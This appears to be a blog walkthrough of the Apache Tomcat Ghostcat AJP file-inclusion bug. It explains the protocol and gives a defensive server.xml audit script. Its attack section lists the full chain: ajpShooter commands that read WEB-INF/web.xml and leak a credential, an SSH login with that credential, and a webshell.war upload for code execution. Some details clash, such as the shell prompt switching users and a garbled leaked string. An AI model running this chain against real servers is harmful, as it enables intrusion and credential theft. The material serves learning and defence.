Ghostcat: hunting and exploiting Apache Ghostcat
The Ghostcat vulnerability is a file inclusion vulnerability that was published in the first quarter of this year, while the world was bracing for the lockdown and the fight against the coronavirus.
It allows any attacker to read files such as configuration files, test files or any other files in the web application directory. Furthermore, if the victim site allows any user to upload files, an attacker can upload a file containing malicious JSP code to the server and then use the vulnerability to include the uploaded file, resulting in remote code execution. Much like the coronavirus's family of viruses, this Ghostcat bug has also been around for a very long time and was only discovered recently. The purpose of this short blog post is to understand, identify and exploit this notorious bug.
The overall idea of the Tomcat server is that it has different ports set up. Of course, there is the 8080 HTTP web service port. Then there is another, lesser-known port, 8009, which runs the AJP (Apache JServ Protocol) service. It is essentially a service implemented over a binary protocol and it allows different operations to be performed.
What is the AJP fuss all about…?
Well, AJP is a binary protocol that reduces the overhead for the application server compared to HTTP. It is similar to HTTP, but at the binary level. Since it is binary, the machine-level conversion is far faster than HTTP parsing. In short, the AJP connector will be used due to:
- It is implemented and exposed by default.
- Persistence requirements in reverse proxies, i.e. performance and load balancing between the front end and the back end application servers.
- Its rich API-level implementation is favoured by developers to push for faster protocol traversal: HTTP(S) data is seamless and can be retrieved with simple API calls (such as the canonical ()).
- AJP allows you to skip the additional parsing and pass an efficient binary interpretation of the request headers between the proxy server and the application server.
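Because the AJP connector is exposed by default, a defender's first check is whether a Tomcat instance still carries the default, unprotected connector. The script below is an added example, not code from the original post; it audits the Connector elements of a server.xml, the XML samples are constructed, and the `address`, `secretRequired` and `secret` attributes are the ones the Tomcat 9 AJP connector documents.

```python
"""Audit a Tomcat server.xml for AJP connectors that are reachable
without a shared secret, which is the exposure Ghostcat relies on.
Added example; the XML samples below are constructed."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector that is not hardened."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        if "AJP" not in conn.get("protocol", "").upper():
            continue  # HTTP connectors are not affected by this bug
        port = conn.get("port", "?")
        # Before Tomcat 9.0.31 an absent address meant "all interfaces"
        address = conn.get("address", "0.0.0.0")
        secret_required = conn.get("secretRequired", "true").lower() != "false"
        secret = conn.get("secret")
        if address not in LOOPBACK:
            findings.append(f"AJP port {port}: bound to {address}, not loopback")
        if not secret_required:
            findings.append(f"AJP port {port}: secretRequired=false")
        elif not secret:
            findings.append(f"AJP port {port}: no secret configured")
    return findings


# Constructed sample: the classic default that Ghostcat hits
WEAK_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

# Constructed sample: loopback only, shared secret required
HARDENED_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET"/>
</Service></Server>"""

if __name__ == "__main__":
    for name, xml in (("weak", WEAK_XML), ("hardened", HARDENED_XML)):
        print(name, audit_ajp_connectors(xml) or ["ok"])
```

If the AJP connector is not needed at all, removing it from server.xml is the simplest fix; the audit then reports nothing because no AJP connector is found.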
Ways to detect the vulnerability
1. You can use the online detection tool published by the researchers who discovered the vulnerability. (Link: https : ///en/ )
2. The manual way.
The manual way of finding it:
As always, in any manual penetration test we do an Nmap scan to detect open ports.
sh-3.2# nmap -sS -sV -T2 10.10.54.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 IST
Nmap scan report for 10.10.54.51
Host is up (0.19s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Tomcat versions 6.x, 7.x, 8.x and 9.x are found to be vulnerable to this issue.
Once we find the required ports highlighted in the result above, you can head to the exploit page: https : ////-CNVD-2020-10487 and run the script.
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read
[<] 302 302
[<] Location: /index.txt/
[<] Content-Length: 0
We are able to retrieve information. Now we can try to retrieve some common files from the WEB-INF folder, such as web.xml.
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1261-1583902632000"
[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1261
Welcome to Tomcat Welcome to ECorpECorp:8730281lkjlkjdqlksalks
We found a string (ks) that appears as a key, which could be used to log in to a system named ECorp with that key via an SSH session.
sh-3.2# ssh ECorp@10.10.54.51
The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.
ECorp@10.10.54.51's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

ECorp@ubuntu:~$ whoami
ECorp
E-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
That's it: we can own the system and retrieve information as the user ECorp, and we can also look for root-level escalation if there are any misconfigurations in the system.
If the application server also allows uploading files, which is generally uncommon, then we can upload WAR files, for example:
$ python tomcat.py upload -u tomcat -p tomcat webshell.war
and gain code execution using this issue.
More on it here: ()